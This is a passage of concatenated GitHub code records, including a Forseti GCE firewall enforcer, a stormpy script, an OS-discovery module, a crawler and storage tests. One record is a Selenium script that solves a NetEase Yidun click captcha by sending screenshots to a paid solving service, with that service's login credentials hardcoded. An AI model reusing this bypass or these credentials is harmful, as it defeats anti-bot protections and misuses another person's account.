%r', response)\n\n return (completed_operations, running_operations)\n\n def wait_for_all_to_complete(self, project, responses, timeout=0):\n \"\"\"Wait for all requests to complete.\n\n Args:\n project: The id of the project to query.\n responses: A list of Response objects from GCE for the operation.\n timeout: An optional maximum time in seconds to wait for an operation\n to complete. Operations that exceed the timeout are marked as\n Failed.\n\n Returns:\n A list of completed requests.\n \"\"\"\n completed_operations = []\n running_operations = responses\n\n while running_operations:\n (completed, running_operations) = (self.wait_for_any_to_complete(\n project, running_operations, timeout))\n completed_operations.extend(completed)\n\n return completed_operations\n\n # pylint: disable=no-self-use\n # TODO: Investigate fixing the pylint issue.\n def is_successful(self, response):\n \"\"\"Checks if the operation finished with no errors.\n\n If the operation response contains an 'error' key, then the error code\n is checked. Any error code that is not ignored causes this to return\n False.\n\n Args:\n response: A GlobalOperations response object from an API call.\n\n Returns:\n True if there were no errors, or all errors are ignored, otherwise\n False.\n \"\"\"\n success = True\n if 'error' in response:\n # 'error' should always contains an 'errors' list:\n if 'errors' in response['error']:\n for error in response['error']['errors']:\n # TODO: Verify current codes.\n # We ignore the following errors:\n # RESOURCE_ALREADY_EXISTS: Because another program somewhere\n # else could have already added the rule.\n # INVALID_FIELD_VALUE: Because the network probably\n # disappeared out from under us.\n if error.get('code') in [\n 'RESOURCE_ALREADY_EXISTS', 'INVALID_FIELD_VALUE'\n ]:\n LOGGER.warn('Ignoring error: %s', error)\n else:\n LOGGER.error('Response has error: %s', error)\n success = False\n else:\n LOGGER.error('Unknown error response: %s', response['error'])\n success = False\n return success\n\n # pylint: disable=no-self-use\n # TODO: Investigate fixing the pylint issue.\n def _create_dry_run_response(self, rule_name):\n \"\"\"A fake successful completed response.\n\n This is used for dry run execution to prevent any changes to the\n existing firewall rules on a project.\n\n Args:\n rule_name: The name of the firewall rule this response is for.\n\n Returns:\n A fake successful completed response.\n \"\"\"\n return {'status': 'DONE', 'name': rule_name}\n\n\nclass FirewallRules(object):\n \"\"\"A collection of validated firewall rules.\"\"\"\n\n def __init__(self, project, rules=None):\n \"\"\"Constructor.\n\n Args:\n project: The GCE project id the rules apply to.\n rules: A list of rule dicts to add to the object.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n self._project = project\n self.rules = {}\n if rules:\n self.add_rules(rules)\n\n def __eq__(self, other):\n \"\"\"Equality.\"\"\"\n return self.rules == other.rules\n\n def __ne__(self, other):\n \"\"\"Not Equal.\"\"\"\n return self.rules != other.rules\n\n def add_rules_from_api(self, firewall_api):\n \"\"\"Loads rules from compute.firewalls().list().\n\n Args:\n firewall_api: A ComputeFirewallAPI instance for interfacing with GCE\n API.\n\n Raises:\n DuplicateFirewallRuleNameError: Two rules have the same name.\n InvalidFirewallRuleError: A rule failed validation.\n \"\"\"\n if self.rules:\n LOGGER.warn(\n 'Can not import rules from the API into a FirewallRules '\n 'object with rules already added')\n return\n\n page_token = ''\n while True:\n if page_token:\n response = firewall_api.list_firewalls(\n self._project, page_token=page_token)\n else:\n response = firewall_api.list_firewalls(self._project)\n\n for item in response.get('items', []):\n rule = dict([(key, item[key]) for key in ALLOWED_RULE_ITEMS\n if key in item])\n self.add_rule(rule)\n\n # Are there additional pages of data?\n if 'nextPageToken' in response:\n page_token = response['nextPageToken']\n else:\n break\n\n def add_rules(self, rules, network_name=None):\n \"\"\"Adds rules from a list of rule dicts.\n\n Args:\n rules: A list of rule dicts to add to the object\n network_name: If set, rules which have no network currently defined\n will have their network set to network_name, and network_name will\n be prepended to the rule name.\n\n Rules that do have a network defined have their network matched\n against network_name, and if they differ the rule is not added.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n for rule in rules:\n self.add_rule(rule, network_name=network_name)\n\n def add_rule(self, rule, network_name=None):\n \"\"\"Adds rule to the self.rules dictionary.\n\n Args:\n rule: A valid dict representing a GCE firewall rule\n network_name: If set, rules which have no network currently defined\n will have their network set to network_name, and network_name will\n be prepended to the rule name.\n\n Rules that do have a network defined have their network matched\n against network_name, and if they differ the rule is not added.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n if not isinstance(rule, dict):\n raise InvalidFirewallRuleError(\n 'Invalid rule type. Found %s expected %s', type(rule), dict)\n\n new_rule = self._order_lists_in_rule(rule)\n\n if network_name:\n if 'network' in new_rule:\n rule_network = get_network_name_from_url(new_rule['network'])\n if rule_network != network_name:\n # Don't add the rule if it's network does not match\n # network_name\n LOGGER.info('Firewall rule does not apply to network %s, '\n 'skipping: %s', rule_network,\n json.dumps(new_rule))\n return\n else:\n new_rule['network'] = build_network_url(self._project,\n network_name)\n\n # Update the rule name by prepending the network, so it is\n # unique. If the new rule does not have a name defined it will\n # fail the _check_rule_before_adding validation and an\n # InvalidFirewallRuleError exception will be raised.\n if 'name' in new_rule:\n # Truncate network name if too long. This may result in\n # duplicate rule names, which will cause the network name\n # to be changed to a md5 hash representation.\n new_name = '%s-%s' % (\n network_name[:(62 - len(new_rule['name']))],\n new_rule['name'])\n\n while new_name in self.rules:\n # Firewall rule names must start with [a-z], hashes\n # could start with a number, so we prepend hn-\n # (hashed network) to the name.\n network_name = 'hn-' + hashlib.md5(\n network_name).hexdigest()\n new_name = '%s-%s' % (\n network_name[:(62 - len(new_rule['name']))],\n new_rule['name'])\n\n new_rule['name'] = new_name\n\n if self._check_rule_before_adding(new_rule):\n self.rules[new_rule['name']] = new_rule\n\n def filtered_by_networks(self, networks):\n \"\"\"Returns the subset of rules that apply to the specified network(s).\n\n Args:\n networks: A list of one or more network names to fetch rules for.\n\n Returns:\n A dictionary of rules that apply to the filtered networks.\n \"\"\"\n filtered_rules = {}\n for rule_name, rule in self.rules.items():\n if get_network_name_from_url(rule['network']) in networks:\n filtered_rules[rule_name] = rule\n\n return filtered_rules\n\n def as_json(self):\n \"\"\"Export rules to a json string.\n\n The JSON string should be an array of Firewall resource objects, see\n https://cloud.google.com/compute/docs/reference/latest/firewalls\n for details. Only the fields in ALLOWED_RULE_ITEMS are permitted.\n\n Returns:\n A JSON string with an array of rules sorted by network and name.\n \"\"\"\n rules = sorted(\n self.rules.values(), key=operator.itemgetter('network', 'name'))\n return json.dumps(rules, sort_keys=True)\n\n def add_rules_from_json(self, json_rules):\n \"\"\"Import rules from a json string as exported by as_json.\n\n The JSON string should be an array of Firewall resource objects, see\n https://cloud.google.com/compute/docs/reference/latest/firewalls\n for details. Only the fields in ALLOWED_RULE_ITEMS are permitted.\n\n The legacy format from older versions of GCE Enforcer is also supported.\n This format wraps the array of Firewall resources in a dictionary under\n the key 'items'.\n\n Args:\n json_rules: The JSON formatted string containing the rules to import.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n if self.rules:\n LOGGER.warn('Can not import from JSON into a FirewallRules object '\n 'with rules already added')\n return\n\n rules = json.loads(json_rules)\n if isinstance(rules, list):\n for rule in rules:\n self.add_rule(rule)\n\n elif isinstance(rules, dict):\n if 'items' in rules:\n for item in rules['items']:\n rule = dict([(key, item[key]) for key in ALLOWED_RULE_ITEMS\n if key in item])\n self.add_rule(rule)\n\n def _order_lists_in_rule(self, unsorted_rule):\n \"\"\"Recursively iterates a rule dictionary and sorts any lists.\n\n This ensures that two rule with the same polices, but with unordered\n lists will compare equal when tested.\n\n Args:\n unsorted_rule: A rule dictionary that has not been sorted.\n\n Returns:\n A new rule dictionary with the lists sorted\n \"\"\"\n sorted_rule = {}\n for key, value in unsorted_rule.items():\n if isinstance(value, list):\n if value and isinstance(value[0], dict): # List of dictionaries\n for i, entry in enumerate(value):\n value[i] = self._order_lists_in_rule(entry)\n\n sorted_rule[key] = sorted(value)\n elif isinstance(value, dict):\n sorted_rule[key] = self._order_lists_in_rule(value)\n else:\n sorted_rule[key] = value\n return sorted_rule\n\n def _check_rule_before_adding(self, rule):\n \"\"\"Validates that a rule is valid and not a duplicate.\n\n Validation is based on reference:\n https://cloud.google.com/compute/docs/reference/latest/firewalls/insert\n\n Args:\n rule: The rule to validate.\n\n Returns:\n True if rule is valid.\n\n Raises:\n DuplicateFirewallRuleNameError: Two or more rules have the same name.\n InvalidFirewallRuleError: One or more rules failed validation.\n \"\"\"\n unknown_keys = set(rule.keys()) - ALLOWED_RULE_ITEMS\n if unknown_keys:\n # This is probably the result of a API version upgrade that didn't\n # properly update this function (or a broken binary).\n raise InvalidFirewallRuleError(\n 'An unexpected entry exists in a firewall rule dict: \"%s\".' %\n ','.join(list(unknown_keys)))\n\n for key in ['allowed', 'name', 'network']:\n if key not in rule:\n raise InvalidFirewallRuleError(\n 'Rule missing required field \"%s\": \"%s\".' % (key, rule))\n\n if 'sourceRanges' not in rule and 'sourceTags' not in rule:\n raise InvalidFirewallRuleError(\n 'Rule missing required field oneof \"sourceRanges\" or '\n '\"sourceTags\": \"%s\".' % rule)\n\n for allow in rule['allowed']:\n if 'IPProtocol' not in allow:\n raise InvalidFirewallRuleError(\n 'Allow rule in %s missing required field '\n '\"IPProtocol\": \"%s\".'\n % (rule['name'], allow))\n\n if len(rule['name']) > 63:\n raise InvalidFirewallRuleError(\n 'Rule name exceeds length limit of 63 chars: \"%s\".' %\n rule['name'])\n\n # TODO: Verify rule name matches regex of allowed\n # names from reference\n\n if rule['name'] in self.rules:\n raise DuplicateFirewallRuleNameError(\n 'Rule %s already defined in rules: %s' %\n (rule['name'], ', '.join(sorted(self.rules.keys()))))\n\n return True\n\n# pylint: disable=too-many-instance-attributes\n# TODO: Investigate improving so we can avoid the pylint disable.\nclass FirewallEnforcer(object):\n \"\"\"Enforce a set of firewall rules for use with GCE projects.\"\"\"\n\n def __init__(self,\n project,\n firewall_api,\n expected_rules,\n current_rules=None,\n project_sema=None,\n operation_sema=None):\n \"\"\"Constructor.\n\n Args:\n project: The id of the cloud project to enforce the firewall on.\n firewall_api: A ComputeFirewallAPI instance for interfacing with GCE\n API.\n expected_rules: A FirewallRules object with the expected rules to be\n enforced on the project.\n current_rules: A FirewallRules object with the current rules for the\n project. If not defined, the API will be queried and the existing\n rules imported into current_rules when apply_firewall is called\n for the project.\n project_sema: An optional semaphore object, used to limit the number\n of concurrent projects getting written to.\n operation_sema: An optional semaphore object, used to limit the number\n of concurrent write operations on project firewalls.\n \"\"\"\n self.project = project\n self.firewall_api = firewall_api\n self.expected_rules = expected_rules\n\n if current_rules:\n self.current_rules = current_rules\n else:\n self.current_rules = None\n\n self.project_sema = project_sema\n self.operation_sema = operation_sema\n\n # Initialize private parameters\n self._rules_to_delete = []\n self._rules_to_insert = []\n self._rules_to_update = []\n\n self._deleted_rules = []\n self._inserted_rules = []\n self._updated_rules = []\n\n def apply_firewall(self,\n prechange_callback=None,\n networks=None,\n allow_empty_ruleset=False):\n \"\"\"Enforce the expected firewall rules on the project.\n\n Args:\n prechange_callback: An optional callback function that will get called\n if the firewall policy for a project does not match the expected\n policy, before any changes are actually applied. If the callback\n returns False then no changes will be made to the project. If it\n returns True then the changes will be pushed. If\n prechange_callback is set to None then the callback will be\n skipped and enforcement will continue as though it had returned\n True.\n\n The callback template is callback_func(project,\n rules_to_delete,\n rules_to_insert,\n rules_to_update)\n\n The callback may be used to limit the kinds of firewall changes\n that are allowed to be pushed for a project, limit the number of\n rules that can get changed, to check if the project should have\n rules changed, etc.\n\n The callback may also raise FirewallEnforcementFailedError if it\n determines that the set of changes to the policy could result in\n an outage for an underlying service, or otherwise are inconsistent\n with business rules. This will cause the enforcement to fail.\n\n networks: A list of networks to limit rule changes to. Rules on\n networks not in the list will not be changed.\n\n Note- This can lead to duplicate rule name collisions since all\n rules are not included when building the change set. The\n change set will be validated before getting enforced and any\n errors will cause a FirewallEnforcementFailedError exception\n to be raised.\n\n allow_empty_ruleset: If set to true and expected_rules has no rules,\n all current firewall rules will be deleted from the project.\n\n Returns:\n The total number of firewall rules deleted, inserted and updated.\n\n Raises:\n FirewallEnforcementFailedError: An error occurred while updating the\n firewall. The calling code should validate the current state of\n the project firewall, and potentially revert to the old firewall\n rules.\n\n Any rules changed before the error occured can be retrieved by\n calling the Get(Deleted|Inserted|Updated)Rules methods.\n \"\"\"\n # Reset change sets to empty lists\n self._rules_to_delete = []\n self._rules_to_insert = []\n self._rules_to_update = []\n\n if not self.current_rules:\n self.refresh_current_rules()\n\n if not self.expected_rules.rules and not allow_empty_ruleset:\n raise FirewallEnforcementFailedError(\n 'No rules defined in the expected rules.')\n\n # Check if current rules match expected rules, so no changes are needed\n if networks:\n if (self.current_rules.filtered_by_networks(networks) ==\n self.expected_rules.filtered_by_networks(networks)):\n LOGGER.info(\n 'Current and expected rules match for project %s on '\n 'network(s) \"%s\".', self.project, ','.join(networks))\n return 0\n elif self.current_rules == self.expected_rules:\n LOGGER.info('Current and expected rules match for project %s.',\n self.project)\n return 0\n\n self._build_change_set(networks)\n self._validate_change_set(networks)\n\n if self.project_sema:\n self.project_sema.acquire()\n\n try:\n if prechange_callback:\n if not prechange_callback(self.project, self._rules_to_delete,\n self._rules_to_insert,\n self._rules_to_update):\n LOGGER.warn(\n 'The callback returned False for project %s, changes '\n 'will not be applied.', self.project)\n return 0\n changed_count = self._apply_change_set()\n finally:\n if self.project_sema:\n self.project_sema.release()\n\n return changed_count\n\n def refresh_current_rules(self):\n \"\"\"Updates the current rules for the project using the compute API.\"\"\"\n current_rules = FirewallRules(self.project)\n current_rules.add_rules_from_api(self.firewall_api)\n\n self.current_rules = current_rules\n\n def get_deleted_rules(self):\n \"\"\"Returns the list of deleted rules.\"\"\"\n return self._deleted_rules\n\n def get_inserted_rules(self):\n \"\"\"Returns the list of inserted rules.\"\"\"\n return self._inserted_rules\n\n def get_updated_rules(self):\n \"\"\"Returns the list of updated rules.\"\"\"\n return self._updated_rules\n\n def _build_change_set(self, networks=None):\n \"\"\"Enumerate changes between the current and expected firewall rules.\"\"\"\n if networks:\n # Build new firewall rules objects from the subset of rules for\n # networks\n current_rules = self.current_rules.filtered_by_networks(networks)\n expected_rules = self.expected_rules.filtered_by_networks(networks)\n else:\n current_rules = self.current_rules.rules\n expected_rules = self.expected_rules.rules\n\n for rule_name in current_rules:\n if rule_name not in expected_rules:\n self._rules_to_delete.append(rule_name)\n\n for rule_name in expected_rules:\n if rule_name not in current_rules:\n self._rules_to_insert.append(rule_name)\n\n for rule_name in expected_rules:\n if rule_name in current_rules:\n if expected_rules[rule_name] != current_rules[rule_name]:\n self._rules_to_update.append(rule_name)\n\n def _validate_change_set(self, networks=None):\n \"\"\"Validate the changeset will not leave the project in a bad state.\"\"\"\n for rule_name in self._rules_to_insert:\n if (rule_name in self.current_rules.rules and\n rule_name not in self._rules_to_delete):\n raise FirewallEnforcementFailedError(\n 'The rule %s is in the rules to insert set, but the same '\n 'rule name already exists on project %s. It may be used on'\n ' a different network.' % (rule_name, self.project))\n\n if networks:\n for rule_name in self._rules_to_update:\n impacted_network = get_network_name_from_url(\n self.current_rules.rules[rule_name]['network'])\n if impacted_network not in networks:\n raise FirewallEnforcementFailedError(\n 'The rule %s is in the rules to update set, but it is '\n 'currently on a network, \"%s\", that is not in the '\n 'allowed networks list for project %s: \"%s\". Updating '\n 'the rule to %s would impact the wrong network.' %\n (rule_name, impacted_network, self.project,\n ', '.join(networks),\n self.expected_rules.rules[rule_name]))\n\n def _apply_change_set(self):\n \"\"\"Updates project firewall rules based on the generated changeset.\n\n Extends self._(deleted|inserted|updated)_rules with the rules changed by\n these operations.\n\n Returns:\n The total number of firewall rules deleted, inserted and updated.\n\n Raises:\n FirewallEnforcementFailedError: Raised if one or more changes fails.\n \"\"\"\n change_count = 0\n\n if self._rules_to_insert:\n LOGGER.info('Inserting rules: %s', ', '.join(self._rules_to_insert))\n rules = [\n self.expected_rules.rules[rule_name]\n for rule_name in self._rules_to_insert\n ]\n insert_function = self.firewall_api.insert_firewall_rule\n (successes, failures, change_errors) = self._apply_change(\n insert_function, rules)\n self._inserted_rules.extend(successes)\n change_count += len(successes)\n if failures:\n raise FirewallEnforcementFailedError(\n 'Firewall enforcement failed while inserting new rules for'\n ' project %s. The following rules had failures: '\n '%s\\nErrors: %s' %\n (self.project, json.dumps(failures), str(change_errors)))\n\n if self._rules_to_delete:\n LOGGER.info('Deleting rules: %s', ', '.join(self._rules_to_delete))\n rules = [\n self.current_rules.rules[rule_name]\n for rule_name in self._rules_to_delete\n ]\n delete_function = self.firewall_api.delete_firewall_rule\n (successes, failures, change_errors) = self._apply_change(\n delete_function, rules)\n self._deleted_rules.extend(successes)\n change_count += len(successes)\n if failures:\n raise FirewallEnforcementFailedError(\n 'Firewall enforcement failed while deleting current rules '\n 'for project %s. The following rules had failures: '\n '%s\\nErrors: %s'\n % (self.project, json.dumps(failures), str(errors)))\n\n if self._rules_to_update:\n LOGGER.info('Updating rules: %s', ', '.join(self._rules_to_update))\n rules = [\n self.expected_rules.rules[rule_name]\n for rule_name in self._rules_to_update\n ]\n update_function = self.firewall_api.update_firewall_rule\n (successes, failures, change_errors) = self._apply_change(\n update_function, rules)\n self._updated_rules.extend(successes)\n change_count += len(successes)\n if failures:\n raise FirewallEnforcementFailedError(\n 'Firewall enforcement failed while updating rules for '\n 'project %s. The following rules had failures: %s\\nErrors:'\n ' %s' %\n (self.project, json.dumps(failures), change_errors))\n\n return change_count\n\n # pylint: disable=too-many-statements,too-many-branches,too-many-locals\n # TODO: Look at not having some of these disables.\n def _apply_change(self, firewall_function, rules):\n \"\"\"Modify the firewall using the passed in function and rules.\n\n If self.operation_sema is defined, then the number of outstanding\n changes is limited to the number of semaphore locks that can be\n acquired.\n\n Args:\n firewall_function: The delete|insert|update function to call for this\n set of rules\n rules: A list of rules to pass to the firewall_function.\n\n Returns:\n A tuple with the rules successfully changed by this function and the\n rules that failed.\n \"\"\"\n applied_rules = []\n failed_rules = []\n change_errors = []\n if not rules:\n return (applied_rules, failed_rules, change_errors)\n\n successes = []\n failures = []\n running_operations = []\n finished_operations = []\n operations = {}\n for rule in rules:\n if self.operation_sema:\n if not self.operation_sema.acquire(False): # Non-blocking\n # No semaphore available, wait for one or more ops to\n # complete.\n if running_operations:\n (completed, running_operations) = (\n self.firewall_api.wait_for_any_to_complete(\n self.project, running_operations,\n OPERATION_TIMEOUT))\n finished_operations.extend(completed)\n for response in completed:\n self.operation_sema.release()\n\n self.operation_sema.acquire(True) # Blocking\n\n try:\n response = firewall_function(self.project, rule)\n except errors.HttpError as e:\n LOGGER.error(\n 'Error changing firewall rule %s for project %s: %s',\n rule.get('name', ''), self.project, e)\n error_str = 'Rule: %s\\nError: %s' % (rule, e)\n change_errors.append(error_str)\n failed_rules.append(rule)\n if self.operation_sema:\n self.operation_sema.release()\n continue\n\n if 'name' in response:\n operations[response['name']] = rule\n running_operations.append(response)\n else:\n LOGGER.error('The response object returned by %r(%s, %s) is '\n 'invalid. It does not contain a \"name\" key: %s',\n firewall_function, self.project,\n json.dumps(rule), json.dumps(response))\n failed_rules.append(rule)\n if self.operation_sema:\n self.operation_sema.release()\n\n responses = self.firewall_api.wait_for_all_to_complete(\n self.project, running_operations, OPERATION_TIMEOUT)\n finished_operations.extend(responses)\n\n if self.operation_sema:\n for response in responses:\n self.operation_sema.release()\n\n for response in finished_operations:\n if self.firewall_api.is_successful(response):\n successes.append(response)\n else:\n failures.append(response)\n\n for result in successes:\n operation_name = result.get('name', '')\n if operation_name in operations:\n applied_rules.append(operations[operation_name])\n else:\n LOGGER.warn(\n 'Successful result contained an unknown operation name, '\n '\"%s\": %s', operation_name, json.dumps(result))\n\n for result in failures:\n operation_name = result.get('name', '')\n if operation_name in operations:\n LOGGER.error(\n 'The firewall rule %s for project %s received the '\n 'following error response during the last operation: %s',\n operations[operation_name], self.project,\n json.dumps(result))\n failed_rules.append(operations[operation_name])\n else:\n LOGGER.warn(\n 'Failure result contained an unknown operation name, '\n '\"%s\": %s', operation_name, json.dumps(result))\n\n return (applied_rules, failed_rules, change_errors)\n","repo_name":"joshiumang107/forseti-security","sub_path":"google/cloud/security/enforcer/gce_firewall_enforcer.py","file_name":"gce_firewall_enforcer.py","file_ext":"py","file_size_in_byte":42939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37279914921","text":"import stormpy\n\n# Set the environment\nenvironment = stormpy.Environment()\n# environment.solver_environment.set_linear_equation_solver_type(stormpy.EquationSolverType.native)\n# ^ uncomment this to see the difference\n\n# Parse program\nprism_program = stormpy.parse_prism_program(\"dtmc.templ\")\ndtmc = stormpy.build_model(prism_program)\n\n# Parse properties\nproperties = stormpy.parse_properties('LRA=? [ \"goal\"]')\nprop = properties[0]\nresult = stormpy.model_checking(dtmc, prop, environment=environment)\nprint(result.at(0))\n","repo_name":"AntoninJarolim/dtmc_deadlock","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73899956627","text":"import logging\nimport os, sys, platform, subprocess\nfrom agent.lib.modulebasecontroller import ModuleBaseController\n\nLOG = logging.getLogger(\"module\")\n\nclass DiscoverOs(ModuleBaseController):\n\n def __init__(self):\n ModuleBaseController.__init__(self)\n\n def index(self):\n return 'Inside TestService MyController index ' + os.getcwd()\n\n def getOsInfo(self):\n osPlatform = platform.platform().upper()\n if osPlatform.find(\"ESX\") > 0:\n modulename = 'discoveros.discover_os_info_esx'\n __import__(modulename)\n module = sys.modules[modulename]\n return module.print_output()\n else:\n cmd = 'sudo dmidecode -s system-manufacturer'\n proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n strOsType = proc.communicate()[0]\n if strOsType.find(\"VMware\") >= 0:\n modulename = 'discoveros.discover_os_info_vm'\n __import__(modulename)\n module = sys.modules[modulename]\n return module.print_output()\n else:\n modulename = 'discoveros.discover_os_info'\n __import__(modulename)\n module = sys.modules[modulename]\n return module.print_output()\n return 'Inside discoverService discoverService getOsInfo'\n\n\n\n\n","repo_name":"yubin154/cronusagentmodules","sub_path":"discoverosmodule/discoveros/discover_os.py","file_name":"discover_os.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28922528773","text":"#encode:utf-8\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver import ActionChains\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom chaojiying import Chaojiying_Client\r\nimport time\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\n\r\n\r\nclass Click_Capture():\r\n def __init__(self, un, pw, soft_id):\r\n self.un = un\r\n self.pw = pw\r\n self.soft_id = soft_id\r\n self.url = 'http://dun.163.com/trial/picture-click'\r\n option = self.set_start_option()\r\n self.driver = webdriver.Chrome(chrome_options=option)\r\n self.wait = WebDriverWait(self.driver, 10)\r\n\r\n def set_start_option(self):\r\n option = Options()\r\n option.add_argument('--window-size=1300,900')\r\n option.add_argument('--disable-infobars')\r\n # option.add_argument('--headless')\r\n return option\r\n def get_first_page(self):\r\n self.driver.get(self.url)\r\n self.driver.execute_script(\"window.scrollTo(0,200)\")\r\n capture_po = self.wait.until(EC.presence_of_element_located((By.XPATH,\r\n '//div[@data-type=\"click_float\"]//div[@class=\"yidun_tips\"]')))\r\n ActionChains(self.driver).move_to_element(capture_po).perform()\r\n\r\n def get_captcha_image(self):\r\n image_loc = self.wait.until(EC.visibility_of_element_located((By.XPATH,\r\n '//div[@data-type=\"click_float\"]//*[@class=\"yidun_bg-img\"]'))).location\r\n print(image_loc)\r\n image = BytesIO(self.driver.get_screenshot_as_png())\r\n im = Image.open(image)\r\n # im.show()\r\n new_image = im.crop((image_loc['x'], image_loc['y']-200, image_loc['x']+400, image_loc['y']+70))\r\n # new_image.show()\r\n captcha = BytesIO()\r\n new_image.save(captcha, format('png'))\r\n return captcha.getvalue()\r\n\r\n\r\n def post_captcha(self,captcha):\r\n cjy = Chaojiying_Client(self.un, self.pw, self.soft_id)\r\n result = cjy.PostPic(captcha, 9103).get('pic_str')\r\n print(result)\r\n position = [i.split(',')for i in result.split('|')]\r\n\r\n return position\r\n def click_words(self, position):\r\n #还差一个点击轨迹。\r\n im = self.wait.until(EC.visibility_of_element_located((By.XPATH,\r\n '//div[@data-type=\"click_float\"]//*[@class=\"yidun_bg-img\"]')))\r\n for x, y in position:\r\n print(x,y)\r\n ActionChains(self.driver).move_to_element_with_offset(im, int(x), int(y)).perform()\r\n ActionChains(self.driver).click().perform()\r\n\r\n def run(self):\r\n try:\r\n self.get_first_page()\r\n captcha = self.get_captcha_image()\r\n position = self.post_captcha(captcha)\r\n self.click_words(position)\r\n finally:\r\n # pass\r\n time.sleep(5)\r\n\r\n self.driver.quit()\r\n\r\nif __name__==\"__main__\":\r\n yidun = Click_Capture('qq849885277', 'luoxuefeng520', '896547')\r\n yidun.run()","repo_name":"luoxuefeng1995/WORK","sub_path":"click_captcha.py","file_name":"click_captcha.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12419408367","text":"import requests\nfrom bs4 import BeautifulSoup\n\nevery_game_log_link = []\n\n\n# gibt html code der gewünschten url zurück\ndef get_url_content(url):\n return requests.get(url).text\n\n\nif __name__ == '__main__':\n count = 1\n i = 2160\n file_count = 1\n while i <= 10000:\n url = 'http://itikawa.com/kifdb/herodb.cgi?table=bg&view=M&sort=1&order=D&recpoint=' + str(i)\n\n content = get_url_content(url)\n soup = BeautifulSoup(content, \"html.parser\")\n for a in soup.find_all('a', href=True):\n if \"http://itikawa.com/bgrPHP/bg.php?\" in a['href']:\n print(str(count) + \" - i:\"+str(i) + \") Found the URL:\", a['href'])\n # every_game_log_link.append(a['href'])\n\n file_dl = get_url_content(a['href'])\n file_soup = BeautifulSoup(file_dl, \"html.parser\")\n for a2 in file_soup.find_all('a', href=True):\n if \"/kifdb/bg/bin/\" in a2['href']:\n print(\"Found the File:\", a2['href'])\n file_url = a2['href'].replace(\"../\", \"http://itikawa.com/\")\n r = requests.get(file_url, allow_redirects=True)\n open(\"../protocol/gamefiles/\" + str(file_count) + \".txt\", 'wb').write(r.content)\n file_count += 1\n count += 1\n i += 10\n","repo_name":"Schlizohr/backgammon","sub_path":"helper/WebCrawler.py","file_name":"WebCrawler.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34594977438","text":"import unittest\nimport os.path\nfrom os import getenv\nfrom datetime import datetime\nfrom models.base_model import Base\nfrom models.amenity import Amenity\nfrom models.engine.db_storage import DBStorage\nfrom models.state import State\nfrom models import *\n\n\n@unittest.skipIf(os.getenv('HBNB_TYPE_STORAGE', 'fs') != 'db', \"db\")\nclass Test_DBStorage(unittest.TestCase):\n \"\"\"\n Test the file storage class\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"create a session\"\"\"\n # close previous connexion to same database\n storage._DBStorage__session.close()\n cls.store = DBStorage()\n test_args = {'updated_at': datetime(2017, 2, 12, 00, 31, 53, 331997),\n 'id': \"0234\",\n 'created_at': datetime(2017, 2, 12, 00, 31, 53, 331900),\n 'name': 'goof'}\n cls.model = Amenity(**test_args)\n cls.store.reload()\n cls.test_len = 0\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"\n Test teardown method\n \"\"\"\n cls.store._DBStorage__session.close()\n storage.reload()\n\n def test_all(self):\n \"\"\"\n Test all method\n \"\"\"\n l1 = len(storage.all('State'))\n state = State(name=\"State test all\")\n state.save()\n output = storage.all('State')\n self.assertEqual(len(output), l1 + 1)\n self.assertIn(state.id, output.keys())\n storage.delete(state)\n\n def test_new(self):\n \"\"\"\n Test new method\n \"\"\"\n # note: we cannot assume order of test is order written\n self.test_len = len(self.store.all())\n # self.assertEqual(len(self.store.all()), self.test_len)\n self.model.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), self.test_len + 1)\n a = Amenity(name=\"thing\")\n a.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), self.test_len + 2)\n\n storage.delete(model)\n storage.delete(a)\n\n def test_save(self):\n \"\"\"\n Test save method\n \"\"\"\n test_len = len(self.store.all())\n a = Amenity(name=\"another\")\n a.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), test_len + 1)\n b = State(name=\"california\")\n self.assertNotEqual(len(self.store.all()), test_len + 2)\n b.save()\n self.store.reload()\n self.assertEqual(len(self.store.all()), test_len + 2)\n\n storage.delete(a)\n storage.delete(b)\n\n def test_reload(self):\n \"\"\"\n Test reload method\n \"\"\"\n self.model.save()\n a = Amenity(name=\"different\")\n a.save()\n self.store.reload()\n for value in self.store.all().values():\n self.assertIsInstance(value.created_at, datetime)\n storage.delete(a)\n\n def test_get(self):\n \"\"\"\n Test get object retrieval\n \"\"\"\n a = self.get(self.model, cls=\"Amenity\", id=\"1234\")\n self.assertIs(type(a), dict)\n b = self.get(self.model, cls=None, id=\"1234\")\n self.assertIs(type(a), None)\n\n storage.delete(a)\n storage.delete(b)\n\n def test_count(self):\n \"\"\"\n Test count method\n \"\"\"\n a = self.count(cls=\"Amenity\")\n self.assertEqual(len(self.store.all(\"Amenity\")), a)\n b = self.count(cls=None)\n self.assertEqual(len(self.store.all()), b)\n\n storage.delete(a)\n 